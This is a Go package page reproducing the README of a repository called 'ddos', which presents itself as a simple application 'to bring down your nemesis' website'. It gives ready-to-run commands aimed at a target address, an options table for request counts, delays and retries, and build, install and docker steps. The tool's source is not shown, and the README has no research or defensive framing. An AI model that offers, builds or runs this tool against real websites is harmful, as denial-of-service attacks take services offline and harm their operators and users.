Categorygithub.com/Streamer272/ddos
modulepackage
1.0.2
Repository: https://github.com/streamer272/ddos.git
Documentation: pkg.go.dev

# README

DDOS

License Stars

Simple DDOS application to bring down your nemesis' website

Usage

ddos --address www.mynemisis.com:443 --output mynemesis-ddos.log --message "HELLO SUCKER" --max-retry-count 100
Option (short)Option (long)Description
-d--delayRequest delay
-r--max-retry-countMaximum retry count
-R--request-countRequest count
-a--addressYour nemesis' website address
-m--messageCustom message to send
-o--outputOutput log file path
-l--log-levelLog level (NONE / ERROR / WARN / INFO)
-H--httpUse HTTP message (only when --message is not specified)
-i--ignore-errorIgnore errors; not terminate program on error
-N--no-colorDisplay non-colored output

Requirements

  • Computer running Linux
  • Go compiler
  • Git

Installation

  • Clone repository using git - git clone https://github.com/Streamer272/ddos.git
  • Move into repository folder - cd ddos
  • Build Go - go build
  • Add to /usr/bin [Optional] - cp ./ddos /usr/bin/ddos

Run in docker

docker run -it --rm -v $(pwd):/home/logs streamer272/ddos --address www.mynemesis.com:443 --output /home/logs/ddos.log --message "HELLO SUCKET" --max-retry-count 100

License

This project is licensed under MIT license.

# Packages

No description provided by the author
No description provided by the author

# Constants

No description provided by the author
No description provided by the author